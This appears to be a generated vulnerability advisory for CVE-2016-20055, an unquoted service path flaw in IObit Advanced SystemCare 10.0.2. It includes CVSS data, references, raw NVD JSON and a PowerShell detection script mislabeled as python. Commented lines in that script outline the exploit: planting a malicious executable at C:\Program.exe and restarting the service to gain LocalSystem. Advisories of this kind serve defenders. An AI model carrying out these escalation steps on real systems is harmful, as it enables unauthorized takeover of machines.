CVE-2016-20055

Description

IObit Advanced SystemCare 10.0.2 contains an unquoted service path vulnerability in the AdvancedSystemCareService10 service that allows local attackers to escalate privileges. Attackers can place a malicious executable in the service path and trigger privilege escalation when the service restarts or the system reboots, executing code with LocalSystem privileges.

CVSS Details

CVSS Score

7.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:iobit:advanced_system_care:*:*:*:*:free:*:*:* - VULNERABLE

IObit Advanced SystemCare 10.0.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# Check for unquoted service paths (PowerShell)
$service = Get-WmiObject -Class Win32_Service -Filter "Name='AdvancedSystemCareService10'"
if ($service) {
    $path = $service.PathName
    if ($path -notmatch '^"' -and $path -match ' ') {
        Write-Host "[+] Vulnerable Service Found: $($service.Name)"
        Write-Host "[+] Path: $path"
        # Exploit Logic (Conceptual)
        # 1. Identify the vulnerable segment (e.g., C:\Program.exe)
        # 2. Copy malicious payload to that location
        # Copy-Item .\malicious.exe "C:\Program.exe"
        # 3. Restart service to trigger
        # Restart-Service -Name $service.Name
    } else {
        Write-Host "[-] Service path is quoted or has no spaces."
    }
} else {
    Write-Host "[-] Service not found."
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2016-20055
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2016-20055
[3] CVE Details https://www.cvedetails.com/cve/CVE-2016-20055/
[4] VulDB https://vuldb.com/cve/CVE-2016-20055
[5] http://www.iobit.com/en/advancedsystemcarefree.php#
[6] http://www.iobit.com/en/index.php
[7] https://www.exploit-db.com/exploits/40577
[8] https://www.vulncheck.com/advisories/iobit-advanced-systemcare-unquoted-service-path-privilege-escalation

Raw JSON Data

JSON

{"cve": {"id": "CVE-2016-20055", "sourceIdentifier": "[email protected]", "published": "2026-04-04T14:16:17.863", "lastModified": "2026-04-14T19:09:27.900", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IObit Advanced SystemCare 10.0.2 contains an unquoted service path vulnerability in the AdvancedSystemCareService10 service that allows local attackers to escalate privileges. Attackers can place a malicious executable in the service path and trigger privilege escalation when the service restarts or the system reboots, executing code with LocalSystem privileges."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-428"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:iobit:advanced_system_care:*:*:*:*:free:*:*:*", "versionEndIncluding": "10.0.2", "matchCriteriaId": "7E20F4E8-FEA2-4666-AFA2-5C176DDD50C9"}]}]}], "references": [{"url": "http://www.iobit.com/en/advancedsystemcarefree.php#", "source": "[email protected]", "tags": ["Product"]}, {"url": "http://www.iobit.com/en/index.php", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/40577", "source": "[email protected]", "tags": ["Exploit", "VDB Entry"]}, {"url": "https://www.vulncheck.com/advisories/iobit-advanced-systemcare-unquoted-service-path-privilege-escalation", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}